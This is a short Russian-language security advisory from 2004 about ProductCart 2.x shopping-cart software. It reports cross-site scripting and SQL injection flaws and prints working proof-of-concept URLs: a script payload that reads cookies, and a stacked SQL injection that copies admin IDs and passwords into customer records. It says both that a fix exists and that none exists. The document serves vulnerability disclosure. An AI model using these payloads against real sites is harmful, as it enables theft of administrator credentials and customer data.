Несколько уязвимостей в ProductCart

Дата публикации:
19.02.2004
Всего просмотров:
1485
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ProductCart 2.x
Уязвимые версии: ProductCart

Описание: Несколько уязвимостей обнаружено в ProductCart. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

1. XSS:

http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.c ookie)</script><"
2. SQL инъекция:
http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&
priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastN
ame=(s--elect%20top%01%20adminpassword%20from%20admins
),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%2
0*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBr
and=0&resultCnt=200&Submit.x=33& 

URL производителя:http://www.earlyimpact.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: EarlyImpact ProductCart shopping cart software multiple security

или введите имя

CAPTCHA